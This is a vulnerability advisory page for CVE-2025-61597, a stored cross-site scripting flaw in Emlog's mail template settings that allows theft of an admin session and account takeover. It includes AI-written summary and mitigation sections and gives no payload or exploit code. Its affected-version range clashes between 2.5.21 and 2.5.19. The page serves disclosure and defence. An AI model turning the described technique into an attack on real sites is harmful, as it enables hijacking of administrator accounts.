CVE-2025-61597
Unknown Unknown - Not Provided
BaseFortify

Publication date: 2025-10-03

Last updated on: 2025-10-20

Assigner: GitHub, Inc.

Description
Emlog is an open source website building system. In versions 2.5.21 and below, an HTML template injection allows stored cross‑site scripting (XSS) via the mail template settings. Once a malicious payload is saved, any subsequent visit to the settings page in an authenticated admin context will execute attacker‑controlled JavaScript, enabling session/token theft and full admin account takeover. This issue is fixed in version 2.5.22.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2025-10-03
Last Modified
2025-10-20
Generated
2026-06-16
AI Q&A
2025-10-03
EPSS Evaluated
2026-06-15
NVD
CVE-2025-61597
EUVD
EUVD-2025-33213
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
emlog emlog to 2.5.19 (inc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-79 The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

This vulnerability is an HTML template injection in Emlog versions 2.5.21 and below, specifically in the mail template settings. It allows an attacker to store malicious JavaScript code that executes when an authenticated admin visits the settings page. This leads to stored cross-site scripting (XSS), enabling the attacker to steal session tokens and take over the admin account.

Impact Analysis

The vulnerability can lead to session or token theft and full admin account takeover. This means an attacker can gain unauthorized administrative access to the website, potentially compromising the entire system and its data.

Mitigation Strategies

Upgrade Emlog to version 2.5.22 or later, as this version contains the fix for the HTML template injection vulnerability that allows stored XSS. Until the upgrade can be performed, restrict access to the mail template settings page to trusted administrators only and avoid visiting the settings page in an authenticated admin context to prevent execution of malicious scripts.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2025-61597. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart